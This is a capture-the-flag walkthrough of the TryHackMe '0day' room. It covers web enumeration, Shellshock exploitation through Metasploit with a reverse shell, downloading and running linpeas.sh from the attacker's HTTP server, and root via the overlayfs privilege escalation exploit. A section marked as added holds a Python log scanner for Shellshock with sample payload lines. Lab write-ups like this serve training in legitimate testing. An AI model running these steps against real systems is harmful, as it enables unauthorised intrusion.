Tryhackme — 0day Walkthrough

Pentestical
5 min read · Oct 22, 2020

Welcome to this writeup for the tryhackme room “0day”. I really enjoyed solving this puzzle!

We start as always with an nmap scan and look for anything interesting.

Figure 1: Full nmap scan

We have SSH on port 22 (OpenSSH 6.6.1p1 Ubuntu) and an Apache web server on port 80. Using the Firefox extension “Wappalyzer” we can figure out what kind of technology is in play.

Figure 2: Apache Webserver running on http://<ip>:80/, inspecting the contents with Wappalyzer.

We can see that there are some JavaScript libraries involved, for example the JavaScript graphics library “particles.js” and some other stuff. After inspecting the source code with F12 or right-click → “View Page Source”, we find something interesting.

Figure 3: Page Source Code of the Webserver.

After googling a bit we came across the so-called “Subresource Integrity”, which can be a security risk, but is more of a rabbit hole. Before starting the directory bruteforce, I always check for /robots.txt and well...

Figure 4: The /robots.txt file on the webserver.

He got me with that one, lol. I’m doing the directory bruteforce with gobuster, dirsearch and dirbuster, but I’ll just show the gobuster output because the others won’t help at all. I’m using the directory bruteforce (dir) mode with the flag -u for the URI, -w for the wordlist and -t 100 for 100 threads. I wanted to speed that up a bit after discovering that he’s trolling me, lol.

Figure 5: Directory Bruteforce with gobuster reveals some hidden paths.

We found an interesting directory “/cgi-bin”, keep that in mind for later. Well, I jumped to /admin and /secret first, obviously. The /admin page won’t be displayed, and /secret looks like he wants to troll me again.

Figure 6: The /secret path reveals a turtle.png image without anything else.

I immediately figured out that this is going to be a rabbit hole. Well, we could try some steganography at this point, but I expected far more from 0day than that. Well, I can’t say that the psychological component isn’t important as well. This is the point where I got stuck and looked for any hints. Let’s see what the room itself has to say about it.

Figure 7: Question Hint for the user.txt flag.

I tried a lot of things at this point, like searching for “hacking history”, googling some hacker groups with “turtle” in their name and a lot more. After figuring out that I don’t know anything about turtles, I took a step back and tried a nikto scan. Don’t neglect that one, it could be painful for you. Nikto is basically a web application scanner and is run with the -h flag for the host. Nikto immediately found some useful information! If nikto says “I found something interesting”, yeah, then it IS really interesting.

Figure 8: Nikto scan reveals the “shellshock” vulnerability.

We come back to “the history of hacking” with the discovery of the shellshock vulnerability at /cgi-bin/test.cgi. After a bit of Google search, we can figure out that there’s a Metasploit exploit for it. Let’s take it easy and do it with Metasploit. We search for the correct exploit within Metasploit.

Figure 9: Metasploit exploit for the shellshock vulnerability.

We set RHOST to the machine IP, LHOST to the attacker IP (which I misspelled at first, so be careful to type “LHOST”), LPORT to some random value like 4444 and, really important, TARGETURI to /cgi-bin/test.cgi. That’s how we can exploit the shellshock vulnerability, which is basically a family of security bugs in the Unix Bash shell: a CGI handler copies request headers into environment variables, and vulnerable Bash versions execute trailing commands when such a variable begins with a function definition. For more details about it read this one: What is Shellshock and why does it matter?
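As a defender’s counterpart to the exploitation above, here is an added example (not code from the original walkthrough) that scans Apache combined-format access log lines for the Shellshock function-definition marker `() {` in the request line, Referer or User-Agent, the headers a CGI handler exports into the environment. The log lines are constructed samples; the /cgi-bin/test.cgi path is the one from the room.

```python
import re
from typing import Dict, List

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A Shellshock payload begins with an exported bash function definition, "() {"
# (whitespace may vary). Matching that prefix catches the whole family of
# variants regardless of what follows it, in any header CGI exports.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Constructed sample lines, not real traffic. Lines 2 and 3 carry the marker
# in the User-Agent and Referer respectively; line 4 is a benign /cgi-bin hit.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Oct/2020:10:00:01 +0000] "GET / HTTP/1.1" 200 1543 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [22/Oct/2020:10:00:07 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "() { :; }; echo x"',
    '10.0.0.9 - - [22/Oct/2020:10:00:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :; }; echo y" "curl/7.68.0"',
    '10.0.0.7 - - [22/Oct/2020:10:00:15 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]


def find_shellshock_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per line whose request line, Referer or User-Agent
    contains the Shellshock function-definition marker."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than crash
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(m.group(field)):
                parts = m.group("request").split(" ")
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "path": parts[1] if len(parts) >= 2 else m.group("request"),
                    "field": field,
                    "status": m.group("status"),
                })
                break  # one record per line even if several headers match
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["path"]} via {hit["field"]} -> {hit["status"]}')
```

A 200 response to a request carrying the marker, as in the first hit, is the one worth escalating: it means the CGI handler ran and the host should be checked for a patched Bash.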

Figure 10: Setting up the options in Metasploit.

After running it with “run” (or “exploit” if you wanna feel like a hacker), we get a reverse connection. Trying Metasploit commands like “hashdump” didn’t work, so I created a shell using the “shell” command.

Figure 11: Starting a shell on the target system.

I used the command (which can be found on https://gtfobins.github.io/ as well):

python -c 'import pty;pty.spawn("/bin/bash")'

to spawn a more stable shell. Now it’s time for privilege escalation, basically getting a root shell! Sometimes just typing “sudo -l” works, but not in this case. I looked at common places on Unix operating systems like /etc/crontab, /opt/, the home folder /home with /home/.secret and a lot more, but couldn’t find anything useful by myself.

Figure 12: Looking for crontabs and common places to escalate the privileges.

With simply using

uname -a

you can figure out that this is a really old operating system. Or you do it the more complicated way with linpeas.sh like me. To transfer it, run the following command in the directory where linpeas.sh is located:

python -m SimpleHTTPServer 8000

on your attacker box and on the target box, download and execute it inside the /tmp folder by entering

cd /tmp

wget http://your-kali-ip:8000/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

We get a yellow PE vector, which means it’s highly likely that we can use that to escalate our privileges.

Figure 12: linpeas.sh output highlights the version number of the OS.

After googling it, we find some juicy exploits. We used Metasploit before so why not use it again? Exit your current session with Ctrl+C and use

meterpreter > background

to background your current session (you need to remember the session ID later, so write it down; if you haven’t messed up, it’s probably ID 1). Now we set up the options; most of them are again the same. Just make sure to choose the correct target ID by typing:

show targets

set target 0

The CVE (target option) we’re gonna use is CVE-2015-1328. By default, it’ll be target 1. Please change that before continuing.

Figure 13: Using the exploit linux/local/overlayfs_priv_esc with the current meterpreter session.

Now the fun part begins!

Figure 14: Using the Metasploit framework to escalate your privileges.

Now we got a root shell. Collect the flags and finish this!

Figure 15: Finding the flags for the sake of fun.

This was a really enjoyable and funny room! Thanks to 0day for creating this one. If you have any questions about this walkthrough, feel free to contact me on Discord: PenTestical#1892.
